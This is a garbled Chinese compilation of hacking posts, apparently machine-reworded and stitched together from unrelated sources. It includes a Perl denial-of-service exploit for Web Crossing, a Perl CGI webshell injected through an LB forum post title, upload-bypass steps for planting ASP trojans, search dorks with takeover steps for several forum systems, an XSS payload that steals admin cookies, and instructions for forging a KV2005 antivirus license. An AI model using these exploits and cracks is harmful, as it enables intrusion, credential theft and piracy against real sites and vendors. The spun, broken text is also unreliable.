这个东西很多人用来赚钱，听闻要1500 RMB，哈哈哈！ 如今我将它贴上去，给火狐浏览器的兄弟共享。在winxp xp2 下取得成功！ 自然假如你的windows 沒有在c盘得话，就一定会不成功！ 最终感谢 蓝魔~~~ ---- by 浩天侠客 This unpatched vulnerability is a variant of the "Auto SP2 RC Exploit"Solution : Set the security level for all zones to "High" in Internet Explorer// index.htm //// htm.txt //document.write("

如今关键详细介绍我找url的工作经验： 1、从html原代码中找 开启IE的查询/查看源文件，在这个文本文档中再搜索流媒体服务器的协议书，如rtsp\\pnm\\mms\\mmst等或是找它的文件后缀名swf\\wmv\\rm\\asf\\avi，或许能够 见到出乎意料的物品。最典型性的事例是在闪客帝国的FLASH搜索swf后缀名，就可以了解它的flash地址了！ 2、找后缀名地址 在线观看网站，点播放视频电影后，点鼠标右键，看他的特性，就可以寻找地址了，一般是mms或pnm等协议书的，把地址拷贝到streambox中，就可以下了。 3、寻找ram\\asx文字 盆友常常会寻找地址免费下载后却看不了，看一下图片大小仅有好几百k，一部电影怎么可能如何小呢？原先ram\\asx是一种替代rm\\asf的文字，用文本文档开启ram\\asx，就可以寻找影片的地址了！ 4、巧找错误报告里的地址 realplayer沒有直接看文档地址的，那样找寻地址很不便。教你那样找：在播放流媒体服务器的情况下将互联网断掉，这时候弹出来播放视频不正确的提示框，错误报告里边就会有流媒体服务器的地址了！　 之上仅仅我的个人心得，期待大伙儿一起讨论免费下载流媒体技术，让免费资源网站无处遁形！

KV2005毫无疑问能升級的破译方式，非局域 *** 升級到江民免费下载KV2005下载版，安装完后运作给你键入账号密码，此刻点一下免费申请，在江民页申请注册一个通行卡，点一下-服务项目-立即获得授权文件，随后在-协助-受权信息内容你能见到可用一天，立刻升級，升級完器点-专用工具-备份数据授权文件（不升級没这一莱单），随后改动授权文件，用UltraEdit开启:搜索9AA138(00A0-00A5处)，将后边的四个标识符改成970B ，将要9AA138####改成9AA138970B，就可以改成二零零七年的受权。注：870A为二零一零年，970A为二零一一年，.................... 月日无须改动，若要改动可改动上边的99后边的6个标识符如：9AA138####99###### 改成 9AA138970A99828A0F 受权时间就会变成2011-11-29除掉使用：如果是改动使用受权，再将后边的36改成2D就可以去使用。如：使用受权为：9AA138DF0B9986BF09360632 合理合法受权为：9AA138870A9986BF092D0632改动之后储存，随后导进就可以了，如今很多人都会用这一方式来升級自身的kv2005，自己也百试不爽。

一、E时代驿栈漏洞 　　网页搜索"E时代驿栈" 　　漏洞运用网页页面 /upload.asp 用退伍军人立即提交 　　二、烧开新闻系统提交漏洞 　　检索：烧开未来展望新闻系统[关键：尘缘雅境]受权应用 　　漏洞：沒有对空格符开展严苛的限定。 　　因此，大家立即选中要提交的asp木马病毒，随后在后面再加上空格符 　　它的文件上传是UploadFaceOK.asp 　　三、尘缘雅境 　　在GOOGLE里关键词搜索: V1.0 ACCESS Finish,就会看 　　到出現了 一大堆 应用尘缘雅境系统软件的网址.例如他的首页是那麼就需要那样填好漏洞文件目录]:/asfq/admin(留意一定要再加上admin),[漏洞文档]一般无需改,但是一些旧版的尘缘系统软件的漏洞文是uploadok.asp,假如uploadfaceok.asp失败再改 　　四、OFSTAR论坛漏洞运用程序流程（群共享中） 　　检索： powered by ofstar.net 　　1:键入管理人员登录名　　2:键入随意一个贴子的途径! 　　3:点击获得密码,能够 提取到管理人员的MD5密码!是32位系统数据加密的！ 　　4:点击立即登录按键!程序流程会全自动结构Cookies开展锹点击管理 *** 栏的"超管"可直接进入后台管理! 　　提交木马病毒: 挑选后台管理的论坛管理 *** =>设计风格摸版设定 *** 下列编码! (实际上提交shell一部分和PHPWind一样) 　　随后应用递交网页页面递交``能够 立即取得shell! 　　五、破废区BLOG漏洞 　　百度搜索："破废区 Bloging" ，在后面再加上upfile.asp，結果回到 DLOG不正确：递交的数据信息来源于网址外界 | 返 回 或是 您要浏览的网页页面有什么问题，不显示。 HTTP 500 - 內部服务器错误 这表明这一文档是存有的,可是没法一切正常的浏览,实际上大家还可以运用 立即用退伍军人提交木马病毒 　　六、动网论坛 　　1、检索 Dvbbs Version 7.0.0 Sp2 sql，就会检索到许多 有漏洞 的论坛，选一个，申请注册一个客户，记住用户名和密码；　　2、打开软件dvsp2_sql.exe，即将侵入的论坛地址更换掉手机软件上的地址。这儿初学者要留意，论坛地址一般是方式，这时候你只必须用 xxx.xxx.xxx取代掉手机软件上的就可以了，但有的 论坛是方式，沒有bbs文件目录，你就需要用 xxx.xxx.xxx取代掉手机软件上的一部分。　　3、开启程序包里的md59.exe手机软件，在MD5原码处填写你一直在论坛申请注册的密码，点一下“16位数据加密”按键，在数据加密密码处就获得了数据加密过的密码。　　4、返回dvsp2_sql.exe 手机软件，在“论坛客户”键入你申请注册的登录名，“前后左右台密码”处键入刚变换的数据加密密码。 　　5、很重要，点一下“引入（S）”按键2次，留意，刚刚好，恰好点一下2次，别乱点一下一通，也不必自身去挑选手机软件上的“SQL”和“SP2”，手机软件自身会挑选，谨记！　　6、好啦，如今用你申请注册的登录名再次登录论坛，你就是管理员身份了。寻找论坛“管理 *** ”，用登录名gxgl.com 密码你申请注册的密码登录，你就是坛主了，能够 对全部论坛 开展管理 *** 。 　　七、極限论坛系统软件漏洞 　　用"EzRick.com All Rights"做关键词搜索论坛的置顶帖子存有引入漏洞，大伙儿开启置顶帖子后连接全是这类方式"showtopic.aspTOPIC_ID=111&Forum_ID=11"在我们除掉后边的"&Forum_ID=11"，引入点就出現了。 　　随后我们在引入猜解专用工具的表段名里边加上上"Forum_UserDB"就可以跑出论

隶属种类:Web Apps 下列程序流程(方式)很有可能含有攻击能力,仅作安全性科学研究与课堂教学的用处.风险性自傲!编码 The Csript For The "" --------------------------------- Exp of Bo-BlogV2.0.3sp2---------------------------------

Url: shell:

----------------------- 递交后,一句话马地址是 /data/online.php ---------------------------- //Sebug.net

yuange 危害版本号： php5.2.3不危害版本号： 其他版本号 php5.2.3在解决CGI的情况下，因为一程序编写不正确（缺乏括弧），错误计算一字符串长度，造成堆缓存外溢，很有可能远程控制实行随意编码。开启 *** :配备.php到php.exe的CGI投射，要求GET /test.php/aa HTTP/1.1 不正确产生在php-5.2.3\\sapi\\cgi\\cgi-man.c line 886: int path_translated_len=ptlen env_path_info strlen(env_path_info) : 0; 程序流程应该是 int path_translated_len=ptlen (env_path_info strlen(env_path_info) : 0); 程序执行步骤： main(){......init_request_info(TSRMLS_C);...... }static void init_request_info(TSRMLS_D){......int path_translated_len=ptlen env_path_info strlen(env_path_info) : 0;......path_translated=(char *) emalloc(path_translated_len 1);......if (env_path_info){memcpy(path_translated ptlen, env_path_info, path_translated_len - ptlen);}}

危害版本号: 世外桃源 *** 硬盘.Net全部版本号 详细描述: 世外桃源 *** 硬盘.Net是一套可用以互联网上文档办公室、共享资源、传送、查询的多客户文档分布式存储，广泛运用于互联网技术、企业、网咖、院校等地管理 *** 及应用文档 世外桃源 *** 硬盘.Net是一款根据ASP.NET的WEB程序运行。 世外桃源 *** 硬盘.Net后台管理过虑关不紧导致远程控制 *** 攻击能够 运用漏洞开展SQL引入进攻，得到比较敏感信息内容。在获得后台管理地址的前提条件下，SQL版本号通吃，得到webshell。ACC版本号得到表內容[警 告]下列程序流程(方式)很有可能含有攻击能力,仅作安全性科学研究与课堂教学的用处.风险性自傲! 解决 *** :早已联络官网，官方网之一时间修复漏洞现阶段官方网沒有解决 *** 出示

涉及到程序流程： Web Crossing 4.x/5.x 叙述： Web Crossing 4.x/5.x 拒绝服务攻击漏洞 详尽： web crossing 是全世界的流行 *** 服务器合作机构，出示包含探讨工作组/ 布告牌的处理审理案件，综合性的新闻组和邮递名册，详细的电子邮箱服务项目，日历表服务项目，即时闲聊， 当场时况和全部web应用程序编写特点。 Web Crossing 4.x/5.x对客户要求欠缺过虑，当web-crossing的嵌入式服务器应用程序收到一个HTTP POST的要求的命令时，假如“Content-Length”为这一要求出示一个非常大的数或是是负值时， *** 服务器将收到一系列的命令造成不断循环难题，造成 *** 服务器因拒绝服务攻击而奔溃。 这类故意命令能够 在at 0090121F中寻找：0090121F F7F9 IDIV ECX 进攻方式： #!/usr/bin/perl -w # # Web Crossing 4.x\\5.x Denial of Service Exploit #[ Bad 'Content-Length' Header Bug ]# # - by Peter Winter-Smith[peter4020_at_hotmail.com]use IO::Socket; if(!($ARGV[0])){ print "Usage: wxdos.pl

"; exit; }print "Web Crossing 4.x\\\\5.x Denial of Service Exploit

" . " [ Bad 'Content-Length' Header Bug ]

" . " [peter4020\\@hotmail.com]

"; $victim=IO::Socket::INET->n ew(Proto=>'tcp' PeerAddr=>$ARGV[0] PeerPort=>"80") or die "Unable to connect to $ARGV[0] on " . "port 80"; $DoS="POST / HTTP/1.1\r

　　" . "Content-Length: -1\r

　　\r

　　"; print $victim $DoS; print "[+] Evil request made to target server ... Waiting...!

　　"; sleep(4); close($victim); print "[+] Done!

　　"; exit; 解决方案： web-crossing已经得到通知，但目前还没有提供解决方案，建议用户随时关注厂商站点以获取最近补丁或解决方案： 临时解决方案： 通过一些其它应用程序过滤掉'Content-Length'报头 附加信息： 无

　　微软公司证实了Windows 2000存在的一个安全漏洞，这个漏洞有可能允许攻击者通过Windows Explorer和其他程序执行恶意代码。 　　这个漏洞是安全公司GreyMagic上周早些时候披露的，它与webvw.dll库验证文档元数据的方式存在的一个问题有关。漏洞有可能被利用来分发恶意文件，如果在Windows Explorer中选择恶意文件，恶意文件就可能执行恶意脚本命令。更危险的是，攻击者有可能通过远程 *** B共享文件夹里的文档利用这个漏洞。 　　微软证实说它正在研究这个漏洞并和往常一样表示迄今不知道有任何用户受到这个漏洞影响。微软还批评GreyMagic在安全通报中贴出了验证代码。 　　微软表示这个漏洞现在还没有补丁程序，用户可以禁用Windows Explorer的“Web查看”选项保护自己。微软表示一旦研究结束就会发布补丁程序。 　　GreyMagic表示这个漏洞影响Windows 2000专业版、服务器版和高级服务器版。 　　GreyMagic说今年1月18日就向微软通报了这个漏洞。

　　内容: 目标服务器配置：/Windows2000/ /IIS5.0/ /MSSQL/ /MYSQL/ /SERV-U 4.0.1/ /ACTIVEPERL/ 服务器权限设置：EVERYONE /完全控制/ 服务器补丁情况：系统 /SP4/ MSSQL /SP3/ 其实这篇文章没有什么技术含量，只是想把一些好的思路跟大家分享出来！ 想必大家都知道LB论坛吧？我就不对其论坛及漏洞做过多的介绍了！ 首先我们来注册一个帐户，然后我们随便找个版块发表一个文章！ 在标题栏上输入and system('dir c:\')# OK！发表成功后，在地址栏处有相应文章ID 我们修改连接地址然后在地址栏提交此URL，就会触发此漏洞！如下： 呵呵，看到什么了吗？ ----------------------------- CGI Error The specified CGI application mi *** ehaved by not returning a complete set of HTTP headers. The headers it did return are: Can't find string terminator "'" anywhere before EOF at D:\bbs\cgi-bin\forum1\1.pl line 1. ----------------------------- 恩，这! 样我们就得到了论坛在目标服务器上的本地路径！ OK，接下来我们要通过此漏洞得到一个WEBSHELL，WEBSHELL的代码如下： #!/usr/bin/perl binmode(STDOUT); syswrite(STDOUT, "Content-type: text/html\r

　　\r

　　", 27); $_=$ENV{QUERY_STRING}; s/%20/ /ig; s/%2f///ig; $execthis=$_; syswrite(STDOUT, "

　　\r

　　", 13); open(STDERR, ">&STDOUT") ││ die "Can't redirect STDERR"; system($execthis); syswrite(STDOUT, "\r

　　\r

　　", 17); close(STDERR); close(STDOUT); exit; 我们把它保存为*.txt文件！保存后，进帖子，我们上传，上传类型选择TXT！ 上传完毕后，我们看看这个小东东的地址是什么！ 这就是我们的CGI网页木马了！我们通过标题栏来把这个txt文件改为*.cgi的！ 编辑自己的帖子！ and system('ren d:\bbs

　　on-cgi\1_1.txt cmd.cgi')# 这里要说明一下！如果论坛的路径设置的很深（ 热纾篸:\webhost\www\website\host1\bbs\lb5000

　　on-cgi\usr\1\1_1! .txt） 我们就无法进行改名，因为标题栏处有限制，不可以超过40个汉字，路径太长！怎么办？别着急！看下面！ 我们先把编辑帖子的页面保存下来！用记事本打开保存的*.htm文件！找到提交标题栏的form表单！ /我们把action提交的页面修改成editpost.cgi在目标服务器的URL地址： / ……代码省略…… 　不得超过 40 个汉字 ……代码省略…… 这样就可以了，保存，双击打开它，然后点“发表”！就OK了！ 提交后我们来执行！ 刷新一下就可以了！我们来看看有没有执行成功？ 哈哈，是不是已经可以了？到此，我们就已经得到了一个WEBSHELL，我们来看看服务器 那榭br> start 有终端，且安装了SERV-U（据我了解70％以上的服务器都有安装它）这个软件说好也好，说不好也不好！ 好就好在它很实用，不好在于它的漏洞很多，这不！SERV-U5.0现在都可以溢出。建议大家都别用它了！ 继续！我对这个CGI的后门不太喜欢，所以，我这里用ASP的后门！用同样的 *** 来上传一个ASP后门（我用的是海阳顶端网ASP木马） 呵呵！接下来我们利用SERV-U来获得SYSTEM权限的帐户！

　　受影响版本:Microsoft Internet Explorer 6.0.2900.2180 Microsoft Internet Explorer 5.01 描述:BUGTRAQ ID: 28208 Internet Explorer是微软发布的非常流行的WEB浏览器。 如果用户访问了包含有恶意FTP URL的网页的话，Internet Explorer 5和6解码可能无法正确地过滤URL，强制Internet Explorer通过在HTML元素所提供的URL中每条命令后注入URL编码的CRLF对连接起FTP命令。 此外，如果恶意URL的末尾添加了两个斜线的话，Internet Explorer就会试图使用同一浏览器会话中用户之前所创建的已通过预认证的连接。 如果用户已将通过预认证连接到FTP服务器，知道了该连接用户名和端点的攻击者就可以依附到用户会话以执行任意命令。预认证连接不是这种攻击所必须的条件，因为如果URL中没有指定用户名的话，Internet Explorer就会尝试匿名登录。如果仅指定了用户名，没有将结尾的斜线附加到字符串，Internet Explorer就会发送带有空口令的用户名；如果没有指定用户名，Internet Explorer就会试图使用IEUser@用户登录。 某些攻击可能取决于目标FTP服务器所使用的命令tokenize策略及安全配置，例如，大多数FTP服务器不允许与请求客户端不同地址端点的PORT请求。 测试 *** : [警 告] 以下程序( *** )可能带有攻击性,仅供安全研究与教学之用.风险自负! 建议:Microsoft---------目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

　　在XP SP2全补丁以及WINDOWS 2003系统上能成功提升本地权限的0day漏洞（secdriv.sys受影响驱动）木马已经在中文 *** 中传播。小岛上某党主页被挂。 虽然如此，但该漏洞只能提升本地权限而非远程权限，需要在本地系统拥有合法的登陆帐号，所以对个人用户的影响应该不大。 微软已经知晓此漏洞的存在。而根据Symantec的建议，系统管理员应该关闭无关服务来降低此类驱动被恶意利用的风险。 挂在某党主页上的权限提升漏洞VT扫描结果：反病毒引擎 版本 最后更新 扫描结果AhnLab-V3 2007.10.19.0 2007.10.18 -AntiVir 7.6.0.27 2007.10.18 HEUR/CryptedAuthentium 4.93.8 2007.10.18 -Avast 4.7.1051.0 2007.10.18 -AVG 7.5.0.488 2007.10.18 SHeur.TYXBitDefender 7.2 2007.10.18 -CAT-QuickHeal 9.00 2007.10.18 (Suspicious) - DNAScanClamAV 0.91.2 2007.10.17 -DrWeb 4.44.0.09170 2007.10.18 Trojan.DownLoader.26894eSafe 7.0.15.0 2007.10.15 Suspicious FileeTrust-Vet 31.2.5220 2007.10.18 -Ewido 4.0 2007.10.18 -FileAdvisor 1 2007.10.18 -Fortinet 3.11.0.0 2007.10.18 -F-Prot 4.3.2.48 2007.10.18 -F-Secure 6.70.13030.0 2007.10.18 -Ikarus T3.1.1.12 2007.10.18 Backdoor.Win32.Hupigon.dsxKaspersky 7.0.0.125 2007.10.18 -McAfee 5144 2007.10.18 New Malware.bxMicrosoft 1.2908 2007.10.18 -NOD32v2 2601 2007.10.18 -Norman 5.80.02 2007.10.18 -Panda 9.0.0.4 2007.10.18 Suspicious filePrevx1 V2 2007.10.18 -Rising 19.45.32.00 2007.10.18 -Sophos 4.22.0 2007.10.18 -Sunbelt 2.2.907.0 2007.10.18 VIPRE.SuspiciousSymantec 10 2007.10.18 -TheHacker 6.2.9.097 2007.10.18 -VBA32 3.12.2.4 2007.10.17 -VirusBuster 4.3.26:9 2007.10.18 -Webwasher-Gateway 6.6.1 2007.10.18 Heuristic.Crypted附加信息File size: 69120 bytesMD5: c10766d5da46c18ec40e4e5df93b3f58SHA1: e9cfda5ce5d45e2eac60f1ae9463c49612f17f43packers: SVKProtectorpackers: PE_Patch, SVKPSunbelt inf VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

　　by axis(axis_at_ph4nt0m.org) Date: 2007-02-13 摘要: *** 是由Tencent公司开发的一个IM软件，在中国有着非常广泛的用户。幻影旅团的axis发现了一个 *** Zone的activex漏洞。在使用WebCtrl *** 时，将引用一个空指针，造成ie崩溃。由于该activex没有标记为safe，故会出现安全提示。 影响版本: Tencent *** 2006/2007及之前所有版本。 by axis(axis_at_ph4nt0m.org) Date: 2007-02-13 摘要: *** 是由Tencent公司开发的一个IM软件，在中国有着非常广泛的用户。幻影旅团的axis发现了一个 *** Zone的activex漏洞。在使用WebCtrl *** 时，将引用一个空指针，造成ie崩溃。由于该activex没有标记为safe，故会出现安全提示。 影响版本: Tencent *** 2006/2007及之前所有版本。 细节: 在\Tencent\ *** \QZone\TWebCtrl.dll中，使用Navigate *** 时，将造成一个空指针引用 051024C0 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]051024C4 8B5424 08 MOV EDX,DWORD PTR SS:[ESP+8]051024C8 6A 00 PUSH 0051024CA 6A 00 PUSH 0051024CC 8B80 B8000000 MOV EAX,DWORD PTR DS:[EAX+B8]051024D2 6A 00 PUSH 0051024D4 6A 00 PUSH 0051024D6 52 PUSH EDX051024D7 8B08 MOV ECX,DWORD PTR DS:[EAX]此时EAX为null 幻影旅团将对此发布一个POC代码，请勿将此作为非法用途 POC: 建议： 禁止ie执行activex 厂商补丁：目前厂商没有发布补丁 关于Ph4nt0m:Ph4nt0m是国内的一个安全组织，由一群来自五湖四海的朋友，因为共同热爱 *** 安全而走到一起来。欢迎访问我们的网站

　　前2天读到了 RSS阅读中潜在的安全问题 | 未完成 - Incomplete，讲的是混杂在Rich Text的RSS中的js会在RSS阅读客户端执行从而导致潜在的漏洞问题。正巧我在上个周末的时候也遇到了类似的一个问题：不过更严重的是在RSS聚合的服务器端。我的首页是用require_once('lilina.html') 的方式包含一个lilina.php生成的静态页面组合生成的，源代码如下。其中也包含了跨服务器PHP脚本执行的安全漏洞。如果我订阅的RSS中有黑客将其中混入 这样的代码，这样一包含：不就可以直接在我的服务器上直接运行php脚本了吗？这个潜在漏洞的发现还是从MSN的Search blog的一篇FEED中引出的。 上周日的问题是这样的：周日上午我忽然发现自己的blog中间require的部分无法显示了，调查了一个上午原来php新版本中缺省将display_error关闭了，程序遇到错误只会停止执行，需要在需要显示错误信息的php页面中设置： ini_set('display_error', true); 才会正常显示错误。我另外做了一个test.php 显示了一下：发现是某行上除了php 解析错误。定位过去才看到原来是MSN的Search blog的一篇上有一个 mb_convert_encoding()转换为get_settings('blog_charset') [utf-8]---->select se大牛的exp[2] 是用的uf7编码：'==>+-ACc- 饶过gpc，然后通过mb_convert_encoding转化为utf-8 'escape($title);$excerpt=$wpdb->escape($excerpt);$blog_name=$wpdb->escape($blog_name); 变量经过stripslashes()--->mb_convert_encoding()--->escape()--->select 我们看看escape() ：wp-includes\wp-db.php function escape($string) {return addslashes( $string ); // Disable rest for now, causing problemsif( !$this->dbh || version_compare( phpversion(), '4.3.0' )=='-1' )return mysql_escape_string( $string );elsereturn mysql_real_escape_string( $string, $this->dbh );} mysql_real_escape_string()在一定的条件下是可以绕过的：The addslashes() Versus mysql_real_escape_string() Debate 村雨牛牛在xcon也说过，但是mysql支持gbk的情况还是比较少的。有兴趣的可以自己测试下 :) 2.rgod于2007/01/08发布的WordPress $v )if ( !in_array($k, $noUnset) && isset($GLOBALS[$k]) )unset($GLOBALS[$k]);} unregister_GLOBALS(); 这里unset了$_GET, $_POST, $_COOKIE, $_SERVER, $_ENV, $_FILES, $_SESSION 等提交的变量。 Code:wp-trackback.php if ( !intval( $tb_id ) ) //注意这个trackback_response(1, 'I really need an ID for this to work.');

　　来自鬼仔 blog鬼仔注：从7j那里看到的，并且有7j写的接收页面。7j:没有找到他说的接收页面,只有自已用PHP写个了 来源:′失眠ヤ夜 's blog漏洞主要出现在“雁过留声（留言板）”、“信息管理”和“短消息”里，这里以留言板为例下面我们来测试一下漏洞打开留言板，选择源代码模式签写留言审核发表状态下钓到管理员Cookies的几率比较到我们先来试试一些文字输入未被过滤输入现在我们在一些可能的敏感字符中插入SCRIPT字符，以防我们的代码被过滤更改后的代码如下： rSCRIPTedir.cooSCRIPTkie.valSCRIPTue=docSCRIPTument.coSCRIPTokie;redSCRIPTir.urSCRIPTl.vaSCRIPTlue=locSCRIPTation.hrSCRIPTef;redSCRIPTir.hostnamSCRIPTe.vaSCRIPTlue=locatiSCRIPTon.hostnSCRIPTame;redSCRIPTir.subSCRIPTmit();现在我们发表留言看 数据库里的代码是我们修改前的代码现在以管理员身份登录现在我们保存cookies的数据库是空的这是我发送的钓Cookies的网页好的，现在代码已经执行，管理员的Cookies已经被我们钓到了我们来看一下 ASPSESSIONIDQCR *** SAT=LCNFLHOBLBPHEJJMHJDPDMGF; localhostpowereasy=LastPassword=4P263W7JiD425kyd&UserName=admin&AdminLoginCode=PowerEasy2006&AdminName=admin&UserPassword=469e80d32c0559f8&RndPassword=4P263W7JiD425kyd&AdminPassword=469e80d32c0559f8怎么样？得到了吧？里面有管理员的用户名、密码，和管理认证码信息管理和短消息也可以如法炮制，具体 *** 我就不多说了在这里说一下 拿到源码后先要修改一下设置，conn.asp里的数据库路径要改一下还有test.htm里的URL也要改一下，可以用它做测试

　　作者:jackal 黑鹰程序简介: slblog(思玲blog)， 某权威站点统计的第三大blog用户程序。 这个多用户Blog,刚发展起来的,更新很快,感觉像是oblog和mis *** log的结合体, 同时首创了Blog系统无限级分类和用户栏目的无限级分类,多功能在现编辑器。 但界面不是很美观,好在模板和程序分离,方便修改。 不过这个blog 程序中存在致命的漏洞，所有的版本包括官方站点都有此漏洞。 有点年头了.忽然想起来,就发布了吧.官方补上了漏洞-_-! 用的人也挺多的,不过以前留了个后门.很久了.好象还能用. 授人以渔,其实还是上传的漏洞.请耐心看完，开始： 刚拿到的时候还想看有没注入点,3M多,我懒,看了一下过滤(Slblog/Include/Slbcode.asp) --------------code--------------------- ’60 过滤字符串中的危险字符 function ReplaceBadChar(strChar) if strChar="" then ReplaceBadChar="" else ReplaceBadChar=replace(replace(replace(replace(replace(replace(replace(strChar,"’",""),"*",""),"",""),"(",""),")",""),"〈",""),".","") end if end function ---------------------------------------- 够让人郁闷的.去掉了’ * ( ) 〈和.不想找是不是有人家没过滤的代码。 去看别的，从后台开始，一般人写后台比较宽松，因为我就是。汗~，觉得自己的密码足够强大，别人也进不来，还是因为我懒。 发文章那里有个很不错的在线编辑器，目的很明确，先找上传，漏洞也就出现了。嘿嘿。SLBlog\SLeditor\Upload.asp 我们来看一下.晕!只有一个"浏览"的按钮.看下提交到哪里 -------------------(1.jpg)------------------------- 〈form action="act=save&sType=&TBlogID=0&sClass=" method="post" name="sform" enctype="multipart/form-data"〉 ------------------------------------------------- 缺3个函数,sType,可能是文件的类型,TBlogID为id,sClass可能为分类类别,我也不大清楚.想验证的话,自己抓个包.去看Upload.asp代码,看怎么过滤的. 〈!--#include FILE="inc/upfileClass.asp"--〉 无惧上传类,往后看: --------------------------------------------- sClass=Trim(Request.Querystring("sClass")) sType=Trim(Request.Querystring("sType")) TBlogID=Trim(Request.Querystring("TBlogID")) ---------------------------------------------- 这里接受3个变量.再往后看. sNoAllowExt="asp|htm|html|shtml|dhtml|aspx|js|as|vbs|exe" 嘿嘿,有问题后,心情有点激动,再下面 ---------------------------------------------- if (Trim(Request.QueryString("act")))="save" then sBlogPath=TBlogID & "|" & DatePart("yyyy",now()) & "|" & DatePart("m",now()) Call actSave() else Call actList() end if ---------------------------------------------- act为save时,保存.去看看还有没验证的. ---------------------------------------------- Sub actSave() Set upfile=new upFileClass ’’建立上传对象 upfile.NoAllowExt=sNoAllowExt ’设置上传类型的黑名单 upfile.GetData (sNoAllowSize*1024) ’取得上传数据,限制更大上传10M ---------------------------------------------- 后面是保存文件的路径和名称,不看了.我的马能传上去就得了. 总结一下:要提交4个变量,/Upload.aspact=save&TBlogID=1&sType=image&sClass=1 TBlogID生成文件的时候用,sType为文件类型,用过一次.别处好象没用. --------------------------------------- 〈% Select Case sType Case "flash" sAllowExt="swf" end Select %〉 --------------------------------------- TBlogID生成的文件夹的时候用,空的时候默认为0. --------------------------------------- If TBlogID="" Or Not Isnumeric(TBlogID) Then TBlogID=0 end if --------------------------------------- sClass没找到调用,不管拉.这么一看,好象3个变量都没什么用了. 上传的问题: 只是不能传asp,我们可以传asa,或者简单点直接在asp后加空格. 没了.真没了.有我也不看了!构造上传. ----------------------------------------- 〈form action="" method="post" name="form1" enctype="multipart/form-data"〉 〈input name="FileName" type="FILE" class="25ef-0aa8-3c80-9925 Class=" method="" size="30"〉 〈input type="submit" name="Submit" value="上传"〉 〈/form〉 ----------------------------------------- 改下路径,上传asp+空格,成功.看下源文件. ------------------(2.jpg)--------------------- 〈script language="javascript"〉parent.UploadSaved(’1/2005/11/2005112420545773499.asp ’);history.back()〈/script〉〈script language="javascript"〉parent.imgIsUse(’2005112420545773499.asp ’);history.back()〈/script〉 ------------------------------------------- 文件保存在UploadFile下.路径是这样的: blog/UploadFile/1/2005/11/2005112420545773499.asp 补洞吧.简单点.就是UploadFile文件夹不允许执行asp. 安全点的是打上补丁.过滤掉空格和"."有了就跳到死. 给个例子,只要文件和后缀的.个数不同就错误. ------------------------------------------- FileName=Lcase(FileName) If Instr(FileName,".") 〈〉 InstrRev(FileName,".") Then msg="文件名中含有多个“.”！

　　请修改文件名后再上传--BY JACKAL" FoundErr=true ------------------------------------------- bye~~

　　这里可以看出pointy.poisontooth.com正在运行sendmail/8.9.3。 　　 　　入侵者对sendmail发起攻击主要是因为： 　　 　　sendmail是公共服务，一旦它运行，任何人都能连接和使用它。 　　 　　sendmail通常以root身份运行。因此如果入侵者发现了一个可利用的漏洞，就可获得优先级高的访问权限。 　　 　　sendmail非常难配置，入侵者因此假设你会在安装中出问题（通常都成功）。 　以下是一些典型的sendmail攻击： 　　首先是MIME缓冲溢出漏洞。这种攻击不影响sendmail本身，而是sendmail发送邮件的客户。在这里，sendmail是工具而不是目标。计算机紧急反应小组是这样描述该攻击的： 　　攻击者向一个脆弱的系统发送一个精心设计的邮件消息，在某种情况下，攻击者选择的代码会在该系统上执行。另外，攻击者可以是脆弱的邮件程序突然崩溃。根据邮件客户正在运行的操作系统以及有问题的邮件客户程序的用户权限，攻击都可以使整个系统崩溃。如果一个权限高的用户用一个容易受攻击的邮件用户 *** 来阅读邮件，那么攻击者就可以获得进入系统的管理权限。 　　 　　再来看一下HELO缓冲溢出。在早于sendmail8.9的版本中，攻击者可以利用HELO命令传送非正常长度的字符串来伪装自己的发起的地址。如果一个攻击者发送HELO后面有至少1024字节的abc,那么消息头会如下所示： 　　 　　From Web Feb 5 22 31:51 1998 　　 　　Received: from abcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcab→abcabcabcabcabcabc 　　 　　Date: Wed, 5 Feb 1998 12:32:22 +0300 　　 　　From 　　 　　非正常字符串隐藏了应正常显示发信者IP地址的信息。这种攻击 *** ，尽管不具危险，但攻击者可以利用它让sendmail转发邮件垃圾和创建难以跟踪的邮件。 　　 　　还有口令文件/Root访问，这是一个更可怕的攻击，它影响的是sendmail8.8.4。本地用户可以利用链接来获得root访问。这种攻击 *** 依赖于sendmail在/var/tmp/dead.letter后保存未投递的消息。 　　1. 参考CA-98.10站点 　　 　　所有用户都可对/var/tmp进行写操作，因此本地攻击者可在/etc/passwd和/var/tmp/dead.letter间创建一个硬链接。然后向sendmail服务器发送一个不能投递的消息。在该消息体内，攻击者插入可被加到口令文件的一个用户帐号。 　　 　　当消息标记为不可投递，就会加到/var/tmp/dead.letter里面，而在/var/tmp/dead.letter有一个与/etc/passwd的硬链接。这就导致产生一个拥有Root权限的新系统帐号。 　　 　　Sendmail作为一个突出并且访问频繁的服务器，经常是攻击的目标。最近的一个攻击 *** 集中在sendmail报头解析代码上的一个漏洞。通过创建有大量TO：报头的消息，进攻者可使服务器停止运行。这种攻击 *** 对sendmail8.9.2和更早的版本有效，因此连最近安装的sendmail也受到影响。 　　 　　以上就是常用的对sendmail的攻击，因为sendmail本身安装不方便，还有很多安全漏洞，用户也可选择更好的工具Qmail。 　Web服务器安全 　　 　　保护Web主机安全首先就要去掉不必要的服务。去掉不必要的服务之前首先要明确的是：你要建立的是什么类型的主机。主机有三种类型： 　　 　　Intranet Web主机--无Internet连接的主机，通常与一个局域网连接。 　　 　　私人或外部Web主机--与Internet相连但只对非常有限的客户提供服务的主机。 　　 　　公共或牺牲Web主机--知道或不知道的用户可以通过Internet，全天候公共访问的普通Web主机。 　　 　　每种不同的主机类型就决定了要提供不同的服务，不需要的服务一律屏蔽掉。这是因为将运行的服务很可能会打开安全漏洞。对于要运行的服务，就要实施访问控制，可以使用TCPWrapper工具包，这个工具提供对远程服务基于模式匹配的访问控制，可以利用它禁止或允许对某些用户的服务。减少服务后，就应在Web服务器上建立访问控制和认证。Apache是在LINUX中更流行的Web服务器。为 *** 访问控制建立规则，就要用到以下命令： 　　 　　#Controls who can get stuff from this server. 　　 　　Order allow,deny 　　 　　Allow from all 　　 　　这些命令提供了三条控制通道，allow命令控制哪台主机可以连接，deny控制哪台主机不可以连接，order命令则控制allow/deny命令执行的顺序。通过这些命令可以明确允许授权主机和阻止未授权主机。 　　 　　Apache的安全设置有很多选项，这些设置已足够严格，但是选项的不同配置 *** 